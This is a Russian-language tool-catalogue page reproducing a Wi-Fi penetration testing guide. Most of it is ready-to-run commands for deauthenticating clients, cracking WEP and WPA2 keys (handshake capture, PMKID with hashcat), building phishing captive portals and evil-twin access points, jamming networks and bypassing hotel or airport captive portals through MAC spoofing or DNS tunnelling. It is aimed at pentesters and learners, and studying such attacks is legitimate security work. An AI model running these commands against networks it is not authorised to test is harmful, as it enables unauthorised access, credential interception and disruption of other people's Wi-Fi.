Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wifi-pentesting-guide — Руководство по тестированию на проникновение Wi-Fi | Kitploit
Инструменты/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
Взлом паролейАудит Wi-FiСбор информацииПост-эксплуатацияБезопасность беспроводных сетейТестирование на ПроникновениеСоциальная инженерияОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
ricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

Руководство по тестированию на проникновение Wi-Fi

РепозиторийСайт
73411382 лет назадПроверено Kitploit

Руководство по тестированию проникновения в WiFi

Содержание

  1. Основные команды

  2. Открытые сети

    2.1. Порталы авторизации

    2.2. Атака «Человек посередине»

  3. Взлом WEP

    3.1. Без клиентов

  4. Взлом WPA2-PSK

    4.1. Взлом 4-стороннего рукопожатия

    4.2. Атака PMKID

    4.3. Атака без точки доступа

  5. WPA2-Enterprise

    5.1. Поддельные точки доступа

    5.2. Полный перебор

    5.3. Поддерживаемые методы EAP

  6. Другие атаки

    6.1. Krack Attack и Frag Attack

    6.2. OSINT

    6.3. Глушение WiFi

    6.4. Другие фреймворки

  7. Пост-эксплуатация

    7.1. Атака на маршрутизатор

    7.2. Типы сканеров

    7.3. Спуфинг



1. Основные команды

Установить переменную окружения

root@kitploit:~
VARIABLE=value

Проверить режим интерфейса

root@kitploit:~
iwconfig $IFACE

Проверить статус интерфейса

root@kitploit:~
ifconfig $IFACE

Установить режим монитора

root@kitploit:~
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

Список сетей

  1. Установите режим монитора

  2. Запустите Airodump-ng

root@kitploit:~
airodump-ng $IFACE -c $CHANNEL -e $ESSID

Деаутентификация

  1. Только один клиент
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. Точка доступа (= все клиенты в этой точке доступа)
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

Получить скрытый SSID с клиентами

  1. Список сетей

Составьте список сетей с помощью Airodump-ng и получите MAC-адрес точки доступа ($AP_MAC) и одного из клиентов ($CLIENT_MAC). Не останавливайте захват.

  1. Деаутентифицируйте

В другом терминале деаутентифицируйте одного или всех клиентов. Когда Airodump-ng захватит рукопожатие от этой сети, имя или ESSID появится в первом терминале:

root@kitploit:~
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

Получить скрытый SSID без клиентов

  1. Список сетей

Составьте список сетей с помощью Airodump-ng и получите MAC-адрес точки доступа ($AP_MAC) и одного из клиентов ($CLIENT_MAC). Не останавливайте захват.

2.a. Выполните атаку по словарю

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. Или выполните атаку полным перебором

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

Для набора символов можно использовать l (строчные буквы), u (заглавные буквы), n (цифры), c (строчные+заглавные), m (строчные+заглавные+цифры) или a (все печатные символы).



2. Открытые сети

2.1. Порталы авторизации

2.1.1. Поддельные порталы авторизации

  1. Клонируйте сайт с помощью HTTrack

  2. Установите Wifiphiser. Поместите результат HTTrack в новую папку wifiphisher/data/phishing-pages/new_page/html и файл конфигурации в wifiphisher/data/phishing-pages/new_page/config.ini.

  3. Перекомпилируйте проект с помощью python setup.py install или бинарника в bin.

  4. Эта команда корректно работает в последней версии Kali после установки hostapd:

root@kitploit:~
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. Обход 1: MAC-спуфинг

Первый метод обхода портала авторизации — изменить ваш MAC-адрес на адрес уже авторизованного пользователя.

  1. Просканируйте сеть и получите список IP- и MAC-адресов. Вы можете использовать:
  • nmap

  • Пользовательский скрипт, например этот (Bash) или этот (Python)

  1. Измените ваш IP- и MAC-адрес. Вы можете использовать:
  • macchanger

  • Пользовательский скрипт, например этот(Bash)

Также можно использовать скрипты для автоматизации процесса, например:

  • Скрипт Poliva

  • Hackcaptiveportals


2.1.3. Обход 2: DNS-туннелирование

Второй метод — создание DNS-туннеля. Для этого необходимо иметь собственный доступный DNS-сервер. Вы можете использовать этот метод, чтобы обойти портал авторизации и получить «бесплатный» Wi-Fi в отелях, аэропортах и т.д.

  1. Проверьте, разрешаются ли доменные имена:
root@kitploit:~
nslookup example.com
  1. Создайте 2 DNS-записи (в Digital ocean, Afraid.org...):
  • A-запись: dns.$DOMAIN, указывающая на $SERVER_IP (Пример: dns.domain.com 139.59.172.117)

  • NS-запись: hack.$DOMAIN, указывающая на dns.$DOMAIN (Пример: hack.domain.com dns.domain.com)

  1. Выполните на сервере
root@kitploit:~
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. Проверьте, работает ли корректно здесь

  2. Выполните на клиенте

root@kitploit:~
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. Создайте туннель
root@kitploit:~
ssh -D 8080 [email protected]

2.2. Атака «Человек посередине»

После подключения к сети можно проверить, уязвима ли она для атак типа «Человек посередине».

  1. ARP-спуфинг с помощью Ettercap

  2. Перехват трафика с помощью Wireshark или TCPdump

  3. Анализ трафика с помощью PCredz (Linux) или Network Miner (Windows)



3. Взлом WEP

  1. Запустите захват
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. Ускорьте захват IV с помощью Поддельной аутентификации + Атаки повторной передачи ARP-запроса + Деаутентификации пользователя. Остановите Airodump примерно на 100,000 уникальных IV
root@kitploit:~
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Взломайте пароль с помощью Aircrack-ng
root@kitploit:~
aircrack-ng $PCAP_FILE


4. Взлом WPA2-PSK

4.1. Взлом 4-стороннего рукопожатия

  1. Запустите захват
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. Деаутентифицируйте пользователя. Остановите захват airodump, когда увидите сообщение 'WPA handshake: $MAC'
root@kitploit:~
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Вариант 1: Взломайте рукопожатие с помощью Aircrack-ng
root@kitploit:~
aircrack-ng -w $WORDLIST capture.cap

Списки слов можно получить здесь.

  1. Вариант 2: Взломайте рукопожатие с помощью Pyrit
root@kitploit:~
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. Атака PMKID

Вы можете использовать этот скрипт или выполнить следующие шаги:

  1. Установите Hcxdumptool и Hcxtool (можно использовать этот скрипт).

  2. Остановите Network Manager

root@kitploit:~
airmon-ng check kill

3a. Если вы хотите атаковать конкретный MAC-адрес

  • Создайте текстовый файл ($FILTER_FILE) и добавьте MAC-адрес без ":". Вы можете использовать sed и перенаправить вывод в файл:
root@kitploit:~
echo $MAC | sed 's/://g' > $FILTER_FILE
  • Захватите PMKID
root@kitploit:~
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. Создайте $HASH_FILE
root@kitploit:~
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

Структура каждой строки: PMKID * MAC РОУТЕРА * СТАНЦИЯ * ESSID (проверьте на: https://www.rapidtables.com/convert/number/hex-to-ascii.html)

  1. Взломайте его с помощью Hashcat (опция 16800)
root@kitploit:~
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force

4.3. Атака без точки доступа

Если у вас есть доступ к клиентскому устройству с включенным Wi-Fi, но рядом нет сети, вы всё равно можете атаковать эту сеть, если клиентское устройство ранее подключалось к ней.

Для этого нужно создать поддельную точку доступа с помощью hostapd и конфигурационного файла, подобного этому, с любым паролем, но тем же именем сети. Создайте поддельную сеть, клиентское устройство попытается подключиться к ней, и вы получите 4-стороннее рукопожатие, как в разделе 4.1 этого руководства.



5. WPA2-Enterprise

5.1 Поддельные точки доступа

Скачивание виртуальных машин

Локальная установка

Если вы не хотите использовать виртуальную машину, вы можете установить всё с помощью:

root@kitploit:~
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack

cd WPA_Enterprise_Attack && sudo sh install.sh

Hostapd & Freeradius-wpe

Запустите точку доступа с помощью:

root@kitploit:~
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE

Когда клиент подключится, прочитайте логи с помощью:

root@kitploit:~
sh freeradius_wpe_read.sh

Hostapd-wpe

root@kitploit:~
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE

5.2 Полный перебор

  • Airhammer

5.3 Поддерживаемые методы EAP

Определите поддерживаемые методы EAP

  • EAP_buster


6. Другие атаки

6.1. Krack Attack и Frag Attack

Это две продвинутые атаки, открытые великим Mathy Vanhoef:

  • Krack Attack Scripts — объяснено на этом сайте

  • Frag Attack Scripts — объяснено на этом сайте

6.2. OSINT

  • Wigle

6.3. Глушение WiFi

  • Wifijammer — эта программа может отправлять пакеты деаутентификации как точкам доступа, так и клиентам.

Пример деаутентификации всех устройств, кроме поддельной точки доступа:

root@kitploit:~
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC

6.4. Другие фреймворки

Linux:

  • Sniffair
  • Wifi Pumpkin — фреймворк для атак с поддельной точкой доступа Wi-Fi
  • Eaphammer — фреймворк для создания поддельных точек доступа
  • WEF — фреймворк для различных типов атак на WPA/WPA2 и WEP, автоматический взлом хэшей и многое другое

Windows:

  • Acrylic — полезно для разведки
  • Ekahau — полезно для планирования Wi-Fi
  • Vistumbler — полезно для вардрайвинга


7. Пост-эксплуатация

После того, как вы подключились к сети

7.1. Атака на маршрутизатор

  • Routersploit — фреймворк для эксплуатации встраиваемых устройств — Проверьте "use scanners/autopwn"

7.2. Типы сканеров

  • Nmap/Zenmap — сканер безопасности, сканер портов и инструмент исследования сети

  • Masscan — более быстрая версия nmap (может нарушить работу, будьте осторожны)

  • Netdiscover — ARP-сниффинг. Очень полезен, если сети сильно сегментированы

7.3. Спуфинг

  • Ettercap — проверьте, можете ли вы выполнить MitM-атаку и перехватить весь трафик в сети
Скачать инструмент
Операционная системаПлатформаУчётные данныеРазмерСсылка
Ubuntu 16.04.5VMwarericardojoserf:wifi3.25 ГБMEGA
Kali 2019.1VMwareroot:wifi4.99 ГБMEGA
Ubuntu 16.04.5VirtualBox (OVA)ricardojoserf:wifi3.18 ГБMEGA
Kali 2019.1VirtualBox (OVA)root:wifi5.56 ГБMEGA